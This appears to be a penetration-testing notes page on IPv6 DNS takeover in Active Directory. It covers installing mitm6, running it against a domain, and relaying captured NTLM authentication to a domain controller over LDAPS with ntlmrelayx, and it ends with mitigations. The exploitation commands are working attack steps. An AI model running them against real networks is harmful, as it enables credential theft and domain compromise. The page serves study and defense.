search
GithubTwitter

IPv6 Attacks

hashtag
Overview

  • If both IPv4 and IPv6 are enabled and v4 is the main protocol, DNS for v6 is not configured

  • Attacker can impersonate IPv6 DNS server

  • Capture authentication requests to DC via LDAP or SMB

  • LDAP relay via NTLM

hashtag
Exploitation

hashtag
Set Up mitm6

git clone https://github.com/fox-it/mitm6 /opt/mitm6
cd /opt/mitm6
pip3 install -r requirements.txt
python3 setup.py install

hashtag
IPv6 DNS Takeover via mitm6

# Run mitm6
mitm6 -d domain.local

# Set up relay against DC
ntlmrelayx.py -6 -t ldaps://192.168.31.10 -wh fakepad.marvel.local -l lootme

hashtag
Mitigation

  • Block DHCPv6 traffic and incoming router advertisements in Windows Firewall via Group Policy

  • Disable WPAD if it's not used via Group Policy

  • Enable LDAP signing and LDAP channel binding

  • Add Administrative users to the Protected Users group or marking them as sensitive and cannot be delegated to prevent impersonation of that user via delegation

PreviousSMB RelayNextDetection & Defense

Last updated